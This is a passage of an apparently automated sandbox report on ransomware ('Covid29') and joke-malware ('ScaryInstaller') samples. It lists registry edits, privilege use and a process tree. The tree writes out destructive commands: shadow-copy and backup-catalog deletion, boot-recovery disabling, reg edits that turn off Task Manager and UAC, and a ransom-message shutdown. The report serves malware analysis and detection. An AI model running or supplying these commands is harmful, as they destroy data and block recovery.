| Set value (int) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\LogicalViewMode = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874385" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 72003200acc001002d577d4720004d53303733357e312e5a49500000560009000400efbe2d577d472d577d472e00000000000000000000000000000000000000000000000000bf667f004d005300200030003700330035002e0036002b0037003400320031002e007a006900700000001c000000 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Mode = "4" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 431563.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: 33 | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.com
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa877246f8,0x7ffa87724708,0x7ffa87724718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4864 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4688 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3304 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2315.tmp\TrojanRansomCovid29.bat" "
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2315.tmp\fakeerror.vbs"
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\2315.tmp\mbr.exe
mbr.exe
C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe
Cov29Cry.exe
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 9
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29LockScreen.exe
Cov29LockScreen.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3444 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3400 /prefetch:8
C:\Users\Admin\Downloads\ScaryInstaller.exe
"C:\Users\Admin\Downloads\ScaryInstaller.exe"
C:\Users\Admin\Downloads\ScaryInstaller.exe
"C:\Users\Admin\Downloads\ScaryInstaller.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A914.tmp\creep.cmd" "
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im explorer.exe
C:\Users\Admin\Downloads\ScaryInstaller.exe
"C:\Users\Admin\Downloads\ScaryInstaller.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\creep.cmd" "
C:\Users\Admin\AppData\Local\Temp\A914.tmp\CreepScreen.exe
CreepScreen.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\SysWOW64\timeout.exe
timeout 5 /nobreak
C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\CreepScreen.exe
CreepScreen.exe
C:\Windows\SysWOW64\timeout.exe
timeout 5 /nobreak
C:\Users\Admin\AppData\Local\Temp\A914.tmp\melter.exe
melter.exe
C:\Windows\SysWOW64\timeout.exe
timeout 10 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C67F.tmp\creep.cmd" "
C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\melter.exe
melter.exe
C:\Windows\SysWOW64\timeout.exe
timeout 10 /nobreak
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\SysWOW64\timeout.exe
timeout 5 /nobreak
C:\Users\Admin\AppData\Local\Temp\C67F.tmp\CreepScreen.exe
CreepScreen.exe
C:\Windows\SysWOW64\timeout.exe
timeout 10 /nobreak
C:\Users\Admin\AppData\Local\Temp\C67F.tmp\melter.exe
melter.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CreepScreen.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im melter.exe
